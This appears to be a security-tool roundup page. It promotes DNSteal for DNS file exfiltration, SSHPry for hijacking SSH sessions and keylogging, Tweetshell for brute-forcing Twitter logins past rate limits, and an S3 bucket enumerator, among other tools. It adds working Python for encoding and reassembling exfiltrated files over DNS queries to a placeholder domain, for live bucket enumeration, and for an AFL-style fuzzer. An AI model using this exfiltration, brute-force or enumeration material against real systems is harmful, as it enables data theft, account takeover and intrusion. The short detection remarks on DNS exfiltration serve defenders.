DNSteal v2.0 – DNS Exfiltration Tool For Stealthily Sending Files Over DNS Requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below are a couple of different images showing examples of multiple file transfer and single verbose file transfer:
- Support for multiple files
- Gzip compression supported
- Now supports the customisation of subdomains and bytes per subdomain and […]
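The three knobs above (compression, subdomains per query, bytes per subdomain) exist because DNS itself constrains how much a single query can carry: a label is at most 63 octets and a full name at most 253 characters. The following is an added example, not DNSteal's own code or wire format, showing how a client splits a file into query names under those limits and how the fake server reassembles them. The base32 label encoding, the leading sequence-number label and the placeholder domain x.example.com are this example's own assumptions.

```python
import base64
import gzip

# DNS limits (RFC 1035): a label is at most 63 octets, a full name at most 253 characters.
MAX_LABEL_LEN = 63
MAX_NAME_LEN = 253


def _to_label(chunk: bytes) -> str:
    """Encode raw bytes as one DNS label. base32 survives case folding by resolvers;
    the '=' padding is not valid in a label, so it is dropped and restored on decode."""
    return base64.b32encode(chunk).decode("ascii").rstrip("=").lower()


def _from_label(label: str) -> bytes:
    """Reverse of _to_label: restore padding to a multiple of 8 characters and decode."""
    text = label.upper()
    text += "=" * (-len(text) % 8)
    return base64.b32decode(text)


def build_queries(data: bytes, domain: str, bytes_per_subdomain: int = 35,
                  subdomains_per_query: int = 3, compress: bool = True) -> list:
    """Split `data` into the query names a client would resolve to leak it.

    Name layout (this example's own, not DNSteal's): <seq>.<label>...<label>.<domain>
    The sequence number lets the server reorder queries that arrive out of order.
    35 raw bytes become a 56-character base32 label, the largest multiple of 5 that fits in 63.
    """
    if compress:
        data = gzip.compress(data, mtime=0)
    chunks = [data[i:i + bytes_per_subdomain] for i in range(0, len(data), bytes_per_subdomain)]
    queries = []
    for seq, start in enumerate(range(0, len(chunks), subdomains_per_query)):
        labels = [_to_label(c) for c in chunks[start:start + subdomains_per_query]]
        for label in labels:
            if len(label) > MAX_LABEL_LEN:
                raise ValueError(f"bytes_per_subdomain={bytes_per_subdomain} gives a "
                                 f"{len(label)}-char label; DNS allows {MAX_LABEL_LEN}")
        name = ".".join([str(seq), *labels, domain])
        if len(name) > MAX_NAME_LEN:
            raise ValueError(f"query name is {len(name)} chars; DNS allows {MAX_NAME_LEN}")
        queries.append(name)
    return queries


def reassemble(queries, domain: str, compress: bool = True) -> bytes:
    """What the fake DNS server does: keep names under our domain, order by seq, concatenate."""
    suffix = "." + domain.lower()
    pieces = {}
    for name in queries:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue  # an unrelated query that happened to reach the server
        labels = name[:-len(suffix)].split(".")
        if not labels[0].isdigit():
            continue  # not one of our chunks
        pieces[int(labels[0])] = b"".join(_from_label(l) for l in labels[1:])
    data = b"".join(pieces[k] for k in sorted(pieces))
    return gzip.decompress(data) if compress else data


if __name__ == "__main__":
    # Constructed sample file; the domain is a placeholder, not a real exfil endpoint.
    DOMAIN = "x.example.com"
    secret = b"user=admin\npassword=hunter2\n" * 20
    names = build_queries(secret, DOMAIN)
    print(f"{len(secret)} bytes -> {len(names)} DNS queries, e.g. {names[0]}")
    # Deliver them in reverse to show the sequence label doing its job.
    assert reassemble(reversed(names), DOMAIN) == secret
```

Running the script shows why gzip matters: 560 bytes of repetitive text compress to a single query, whereas uncompressed data needs one query per 105 bytes at these settings. From the defender's side the same arithmetic is the detection signal: long, high-entropy base32-looking labels and bursts of unique subdomains under one zone are exactly what DNS exfiltration looks like in resolver logs.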

Angrgdb – Use Angr Inside GDB – Create An Angr State From The Current Debugger State

Use angr inside GDB. Create an angr state from the current debugger state.
Install:
pip install angrgdb
echo "python import angrgdb.commands" >> ~/.gdbinit
Usage: angrgdb implements the angrdbg API in GDB. You can use it in scripts like this:
import gdb                     # the GDB Python API, available inside gdb's embedded interpreter
from angrgdb import *
gdb.execute("b *0x004005f9")   # break just before the input is checked
gdb.execute("r aaaaaaaa")      # run with a dummy argument
sm = StateManager()            # build an angr state from the current GDB state
sm.sim(sm["rax"], 100)         # make 100 bytes at the address in rax symbolic
m = sm.simulation_manager()
m.explore(find=0x00400607, avoid=0x00400613)
sm.to_dbg(m.found[0])          # write the solved input back into GDB memory
gdb.execute("x/s $rax")
# 0x7fffffffe768: "ais3{I_tak3_g00d_n0t3s}"
gdb.execute("c")
# Correct! that […]

SSHPry v2.0 – Spy on and Control an SSH-Connected Client's TTY

This is the second release of the SSHPry tool, with multiple features added:
- Control of the target's TTY
- Built-in keylogger
- Console-level phishing
- Record & replay previous sessions
Demo blogpost: http://www.korznikov.com/2017/09/sshpry-v2-spy-control-ssh-connected.html
Twitter: @nopernik
Howto: ./sshpry2.py
Files: sshpry2.py – the tool. Everything else is parts of code used in the tool (it does not depend on them).
Download SSHPry2.0

HikPwn – A Simple Scanner For Hikvision Devices

[*] HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. This project was born out of curiosity while I was capturing and watching network traffic generated by some of Hikvision's software and devices.
Setup instructions:
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt
Tested on: Python 3.8 on Linux 4.19 […]

Sandcastle – A Python Script For AWS S3 Bucket Enumeration

[*] Inspired by a conversation with Instacart's @nickelser on HackerOne, I've optimised and published Sandcastle – a Python script for AWS S3 bucket enumeration, formerly known as bucketCrawler. The script takes a target's name as the stem argument (e.g. shopify) and iterates through a file of bucket name permutations, such as the ones below:
-training
-bucket
-dev
-attachments
-photos
-elasticsearch
[…]
Getting […]
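The stem-plus-permutation idea is simple enough to show end to end. The following is an added example, not Sandcastle's code: it builds candidate names from a stem and a permutation list, drops names S3 would never accept, and interprets the unauthenticated response per candidate. The two name shapes (stem-suffix and suffix-stem), the simplified S3 naming rules, the response classification and the constructed sample responses are all this example's assumptions; the real script's exact permutation logic is not shown on the page.

```python
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# Constructed sample of the permutation file (one suffix per line), mirroring the excerpt above.
PERMUTATIONS = """\
-training
-bucket
-dev
-attachments
-photos
-elasticsearch
"""

# Simplified S3 bucket naming rules (assumption): 3-63 chars of lowercase letters, digits,
# dots and hyphens; alphanumeric at both ends; no ".."; not shaped like an IPv4 address.
_BUCKET_RE = re.compile(r"^[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]$")
_IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def is_valid_bucket_name(name: str) -> bool:
    """Skip candidates S3 would reject outright; they only waste requests."""
    return bool(_BUCKET_RE.match(name)) and not _IPV4_RE.match(name) and ".." not in name


def candidate_names(stem: str, permutations: str) -> List[str]:
    """Expand a stem into <stem><perm> and <perm-without-dash>-<stem>, deduplicated and valid."""
    stem = stem.lower()
    seen: Dict[str, None] = {}
    for line in permutations.splitlines():
        word = line.strip()
        if not word or word.startswith("#"):
            continue
        core = word.strip("-")
        for name in (stem + word, core + "-" + stem):
            if is_valid_bucket_name(name):
                seen.setdefault(name, None)
    return list(seen)


def classify(status: int, body: str) -> str:
    """Map an unauthenticated GET of http://<name>.s3.amazonaws.com/ to a verdict (assumed shapes)."""
    if status == 404 and "NoSuchBucket" in body:
        return "absent"
    if status == 200 and "<ListBucketResult" in body:
        return "public-listable"      # anonymous listing works: the interesting finding
    if status == 403:
        return "exists-private"       # AccessDenied / AllAccessDisabled: name is taken
    if status in (301, 307):
        return "exists-redirect"      # bucket lives in another region
    return f"unknown-{status}"


def http_fetch(url: str) -> Tuple[int, str]:
    """Live fetch for real use; not called by the demo or tests below."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read(4096).decode("utf-8", "replace")


def enumerate_buckets(stem: str, permutations: str,
                      fetch: Callable[[str], Tuple[int, str]]) -> Dict[str, str]:
    """Probe every candidate and keep the ones that exist in any form."""
    results = {}
    for name in candidate_names(stem, permutations):
        status, body = fetch(f"http://{name}.s3.amazonaws.com/")
        verdict = classify(status, body)
        if verdict != "absent":
            results[name] = verdict
    return results


# Constructed offline stand-in for S3 so the example runs without network access.
SAMPLE_RESPONSES = {
    "shopify-dev": (403, "<Error><Code>AccessDenied</Code></Error>"),
    "shopify-photos": (200, '<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'),
    "attachments-shopify": (301, "<Error><Code>PermanentRedirect</Code></Error>"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    name = url.split("//", 1)[1].split(".s3.amazonaws.com", 1)[0]
    return SAMPLE_RESPONSES.get(name, (404, "<Error><Code>NoSuchBucket</Code></Error>"))


if __name__ == "__main__":
    for name, verdict in enumerate_buckets("shopify", PERMUTATIONS, fake_fetch).items():
        print(f"{name:24s} {verdict}")
```

Swap fake_fetch for http_fetch to run it for real. Treating 403 as a hit is the practical point: a bucket that exists but denies anonymous listing still confirms the name is taken, which is what a follow-up with credentials or a permissions test would need.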

Tweetshell – Multi-thread Twitter BruteForcer In Shell Script

Tweetshell is a shell script to perform a multi-threaded brute force attack against Twitter. This script can bypass login rate limiting and can test an unlimited number of passwords at a rate of over 400 passwords/min using 20 threads.
Legal disclaimer: Usage of TweetShell for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey […]

Jackdaw – Tool To Collect All Information In Your Domain And Show You Nice Graphs

Jackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs of how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting […]

Frida API Fuzzer – This Experimental Fuzzer Is Meant To Be Used For API In-Memory Fuzzing

This experimental fuzzer is meant to be used for API in-memory fuzzing. The design is highly inspired by and based on AFL/AFL++. At the moment the mutator is quite simple, just AFL's havoc and splice stages. I have tested only the examples under tests/; this is a WIP project but is known to work at least on GNU/Linux x86_64 and Android […]
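"Just havoc and splice" is worth seeing concretely, because those two stages are what the mutator does before Frida ever calls the target. The following is an added example, not the project's code and not Frida-specific: a reduced havoc stage (stacked random bit flips, interesting values, arithmetic, block deletes and clones) and AFL's splice (crossing two inputs between their first and last differing bytes), driven against a constructed toy parser with a deliberate off-by-one. The mutation menu, its caps and the toy target are this example's own assumptions; there is no coverage feedback, which is the main thing AFL adds on top.

```python
import random
from typing import Callable, List, Optional, Tuple

INTERESTING_8 = [-128, -1, 0, 1, 16, 32, 64, 100, 127]   # AFL's interesting_8 table
ARITH_MAX = 35                                           # AFL's arithmetic delta bound
MAX_INPUT = 4096                                         # cap growth from repeated clones


def havoc(data: bytes, rng: random.Random, rounds: Optional[int] = None) -> bytes:
    """AFL-style havoc: stack 1..128 random mutations from a small menu onto one input."""
    buf = bytearray(data)
    if rounds is None:
        rounds = 1 << rng.randint(0, 7)
    for _ in range(rounds):
        if not buf:                               # never mutate an empty buffer; reseed it
            buf = bytearray([rng.randrange(256)])
            continue
        op = rng.randint(0, 5)
        pos = rng.randrange(len(buf))
        if op == 0:                               # flip one bit
            buf[pos] ^= 1 << rng.randint(0, 7)
        elif op == 1:                             # overwrite with an interesting 8-bit value
            buf[pos] = rng.choice(INTERESTING_8) & 0xFF
        elif op == 2:                             # small wrapping add/subtract
            buf[pos] = (buf[pos] + rng.randint(-ARITH_MAX, ARITH_MAX)) & 0xFF
        elif op == 3:                             # random byte
            buf[pos] = rng.randrange(256)
        elif op == 4 and len(buf) > 1:            # delete a block
            del buf[pos:rng.randint(pos + 1, len(buf))]
        elif len(buf) < MAX_INPUT:                # clone a block and insert it elsewhere
            src = rng.randrange(len(buf))
            length = rng.randint(1, min(len(buf) - src, 64))
            buf[pos:pos] = buf[src:src + length]
    return bytes(buf)


def splice(a: bytes, b: bytes, rng: random.Random) -> Optional[bytes]:
    """AFL splice: keep a's head and b's tail, cutting somewhere inside the region where they differ."""
    n = min(len(a), len(b))
    diffs = [i for i in range(n) if a[i] != b[i]]
    if len(a) < 2 or len(b) < 2 or not diffs or diffs[0] == diffs[-1]:
        return None                               # identical or too similar, as AFL's retry_splicing
    cut = rng.randint(diffs[0], diffs[-1] - 1)
    return a[:cut] + b[cut:]


def toy_target(buf: bytes) -> int:
    """Constructed stand-in for an in-memory API under test: a length-prefixed record parser."""
    if not buf:
        return 0
    n = buf[0]
    payload = buf[1:1 + n]
    if len(payload) != n:
        return -1                                 # truncated record, rejected cleanly
    return payload[n - 1]                         # BUG: n == 0 reads payload[-1] -> IndexError


def fuzz(target: Callable[[bytes], int], seeds: List[bytes],
         iterations: int = 3000, seed: int = 0) -> List[Tuple[bytes, str]]:
    """Minimal loop: pick a corpus entry, maybe splice with another, havoc it, call the target."""
    rng = random.Random(seed)
    corpus = list(seeds)
    crashes = []
    for _ in range(iterations):
        base = rng.choice(corpus)
        if len(corpus) > 1 and rng.random() < 0.3:
            spliced = splice(base, rng.choice(corpus), rng)
            if spliced is not None:
                base = spliced
        candidate = havoc(base, rng)
        try:
            target(candidate)
        except Exception as exc:                  # an uncaught exception is our "crash" signal
            crashes.append((candidate, type(exc).__name__))
        else:
            if len(corpus) < 64:                  # no coverage map here, so just bound the corpus
                corpus.append(candidate)
    return crashes


if __name__ == "__main__":
    found = fuzz(toy_target, [b"\x05hello", b"\x02hi"])
    print(f"{len(found)} crashing inputs; first: {found[0] if found else None}")
```

Every crash the loop reports has a zero length byte, which is the whole bug; with a real harness the "crash" signal would come from Frida's exception handler rather than a Python exception, and a coverage map would decide which mutated inputs are worth keeping.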
